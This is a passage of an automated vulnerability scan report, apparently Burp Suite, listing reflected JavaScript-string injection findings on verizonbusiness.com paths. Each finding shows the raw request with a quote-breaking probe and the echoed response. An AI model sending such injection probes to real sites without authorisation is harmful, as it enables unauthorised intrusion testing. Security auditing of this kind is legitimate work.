Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40606
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/secf096';3131f4d27f6/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.865. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20bc9"%3b121f436987f was submitted in the REST URL parameter 1. This input was echoed as 20bc9";121f436987f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se20bc9"%3b121f436987f/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/se20bc9";121f436987f/solutions/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.866. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61f23'%3be99f480ab8f was submitted in the REST URL parameter 1. This input was echoed as 61f23';e99f480ab8f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se61f23'%3be99f480ab8f/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/se61f23';e99f480ab8f/solutions/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.867. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aead"%3b77920b07542 was submitted in the REST URL parameter 2. This input was echoed as 1aead";77920b07542 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se/solutions1aead"%3b77920b07542/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:59:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41122
Date: Wed, 17 Nov 2010 00:59:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/se/solutions1aead";77920b07542/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.868. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce82f'%3b6173aab2f5f was submitted in the REST URL parameter 2. This input was echoed as ce82f';6173aab2f5f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se/solutionsce82f'%3b6173aab2f5f/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41122
Date: Wed, 17 Nov 2010 01:00:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/se/solutionsce82f';6173aab2f5f/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.869. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b7f9"%3b3ade5f339cc was submitted in the REST URL parameter 3. This input was echoed as 6b7f9";3ade5f339cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se/solutions/var6b7f9"%3b3ade5f339cc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:13 GMT
Content-Type: text/html
Content-Length: 42334
Date: Wed, 17 Nov 2010 01:00:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/se/solutions/var6b7f9";3ade5f339cc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.870. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28959'%3bb5535bd39ac was submitted in the REST URL parameter 3. This input was echoed as 28959';b5535bd39ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se/solutions/var28959'%3bb5535bd39ac/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42336
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/se/solutions/var28959';b5535bd39ac/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.871. http://www.verizonbusiness.com/sg/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /sg/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94dbf'%3b0009227c96d was submitted in the REST URL parameter 1. This input was echoed as 94dbf';0009227c96d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sg94dbf'%3b0009227c96d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/sg94dbf';0009227c96d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.872. http://www.verizonbusiness.com/sg/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /sg/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9474a"%3b1f1fd3e3623 was submitted in the REST URL parameter 1. This input was echoed as 9474a";1f1fd3e3623 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sg9474a"%3b1f1fd3e3623/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/sg9474a";1f1fd3e3623/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.873. http://www.verizonbusiness.com/sitemap/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a60bc'%3b6a7ca198b5c was submitted in the REST URL parameter 1. This input was echoed as a60bc';6a7ca198b5c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemapa60bc'%3b6a7ca198b5c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40616
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/sitemapa60bc';6a7ca198b5c/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.874. http://www.verizonbusiness.com/sitemap/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 506d2"%3ba3241f7926e was submitted in the REST URL parameter 1. This input was echoed as 506d2";a3241f7926e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap506d2"%3ba3241f7926e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40614
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/sitemap506d2";a3241f7926e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.875. http://www.verizonbusiness.com/solutions/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2488"%3bfcc25c962ee was submitted in the REST URL parameter 1. This input was echoed as c2488";fcc25c962ee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsc2488"%3bfcc25c962ee/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40618
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsc2488";fcc25c962ee/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.876. http://www.verizonbusiness.com/solutions/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29b0a'%3b9f85ea7704b was submitted in the REST URL parameter 1. This input was echoed as 29b0a';9f85ea7704b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions29b0a'%3b9f85ea7704b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:51 GMT
Content-Type: text/html
Content-Length: 40620
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions29b0a';9f85ea7704b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.877. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byindustry/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b355'%3b36a4f30df9b was submitted in the REST URL parameter 1. This input was echoed as 4b355';36a4f30df9b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions4b355'%3b36a4f30df9b/byindustry/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
